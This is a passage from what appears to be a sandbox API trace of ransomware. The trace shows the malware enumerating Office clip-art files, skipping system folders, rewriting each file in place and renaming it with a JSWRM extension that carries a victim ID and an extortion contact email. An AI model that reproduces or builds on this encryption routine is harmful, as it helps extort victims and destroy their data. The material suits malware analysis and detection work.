(lpString1="WB01750_.GIF", lpString2="msocache") returned 1 [0099.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0099.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01750_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01750_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01750_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0099.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0099.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01750_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01750_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01750_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0099.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0099.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0099.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0099.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01750_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01750_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.641] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1172) returned 1 [0099.641] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x490) returned 0x230a00 [0099.641] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x490, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x490, lpOverlapped=0x0) returned 1 [0099.643] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.643] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x490, lpOverlapped=0x0) returned 1 [0099.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0099.643] CloseHandle (hObject=0x314) returned 1 [0099.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0099.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0099.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0099.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0099.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0099.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0099.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0099.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0099.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.643] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01750_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01750_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01750_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01750_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0099.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0099.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0099.644] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10c77030, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3b9, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01751_.GIF", cAlternateFileName="")) returned 1 [0099.644] lstrcmpiW (lpString1="WB01751_.GIF", lpString2=".") returned 1 [0099.644] lstrcmpiW (lpString1="WB01751_.GIF", lpString2="..") returned 1 [0099.644] lstrcmpiW (lpString1="WB01751_.GIF", lpString2="...") returned 1 [0099.644] lstrcmpiW (lpString1="WB01751_.GIF", lpString2="windows") returned -1 [0099.644] lstrcmpiW (lpString1="WB01751_.GIF", lpString2="recovery") returned 1 [0099.644] lstrcmpiW (lpString1="WB01751_.GIF", lpString2="perflogs") returned 1 [0099.644] lstrcmpiW (lpString1="WB01751_.GIF", lpString2="documents and settings") returned 1 [0099.644] lstrcmpiW (lpString1="WB01751_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.645] lstrcmpiW (lpString1="WB01751_.GIF", lpString2="system volume information") returned 1 [0099.645] lstrcmpiW (lpString1="WB01751_.GIF", lpString2="msocache") returned 1 [0099.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0099.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01751_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01751_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01751_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0099.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0099.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01751_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01751_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01751_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0099.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0099.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0099.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0099.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01751_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01751_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.645] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=953) returned 1 [0099.645] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3b0) returned 0x230a00 [0099.646] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x3b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x3b0, lpOverlapped=0x0) returned 1 [0099.647] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.647] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x3b0, lpOverlapped=0x0) returned 1 [0099.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0099.647] CloseHandle (hObject=0x314) returned 1 [0099.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0099.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0099.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0099.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0099.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0099.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0099.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0099.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0099.648] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01751_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01751_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01751_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01751_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0099.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0099.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0099.649] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10c77030, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x304, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01770_.GIF", cAlternateFileName="")) returned 1 [0099.649] lstrcmpiW (lpString1="WB01770_.GIF", lpString2=".") returned 1 [0099.649] lstrcmpiW (lpString1="WB01770_.GIF", lpString2="..") returned 1 [0099.649] lstrcmpiW (lpString1="WB01770_.GIF", lpString2="...") returned 1 [0099.649] lstrcmpiW (lpString1="WB01770_.GIF", lpString2="windows") returned -1 [0099.649] lstrcmpiW (lpString1="WB01770_.GIF", lpString2="recovery") returned 1 [0099.649] lstrcmpiW (lpString1="WB01770_.GIF", lpString2="perflogs") returned 1 [0099.649] lstrcmpiW (lpString1="WB01770_.GIF", lpString2="documents and settings") returned 1 [0099.649] lstrcmpiW (lpString1="WB01770_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.649] lstrcmpiW (lpString1="WB01770_.GIF", lpString2="system volume information") returned 1 [0099.649] lstrcmpiW (lpString1="WB01770_.GIF", lpString2="msocache") returned 1 [0099.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01770_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01770_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01770_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0099.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01770_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01770_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01770_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0099.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0099.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0099.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0099.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01770_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01770_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.650] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=772) returned 1 [0099.650] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x300) returned 0x20b1f8 [0099.650] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x300, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x300, lpOverlapped=0x0) returned 1 [0099.651] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.651] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x300, lpOverlapped=0x0) returned 1 [0099.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0099.651] CloseHandle (hObject=0x314) returned 1 [0099.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0099.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0099.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0099.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0099.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0099.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0099.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0099.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0099.652] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01770_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01770_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01770_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01770_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0099.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0099.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0099.653] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe44, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01838_.GIF", cAlternateFileName="")) returned 1 [0099.653] lstrcmpiW (lpString1="WB01838_.GIF", lpString2=".") returned 1 [0099.653] lstrcmpiW (lpString1="WB01838_.GIF", lpString2="..") returned 1 [0099.653] lstrcmpiW (lpString1="WB01838_.GIF", lpString2="...") returned 1 [0099.653] lstrcmpiW (lpString1="WB01838_.GIF", lpString2="windows") returned -1 [0099.653] lstrcmpiW (lpString1="WB01838_.GIF", lpString2="recovery") returned 1 [0099.653] lstrcmpiW (lpString1="WB01838_.GIF", lpString2="perflogs") returned 1 [0099.653] lstrcmpiW (lpString1="WB01838_.GIF", lpString2="documents and settings") returned 1 [0099.653] lstrcmpiW (lpString1="WB01838_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.653] lstrcmpiW (lpString1="WB01838_.GIF", lpString2="system volume information") returned 1 [0099.653] lstrcmpiW (lpString1="WB01838_.GIF", lpString2="msocache") returned 1 [0099.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0099.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01838_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01838_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01838_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0099.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0099.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01838_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01838_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01838_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0099.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0099.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0099.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 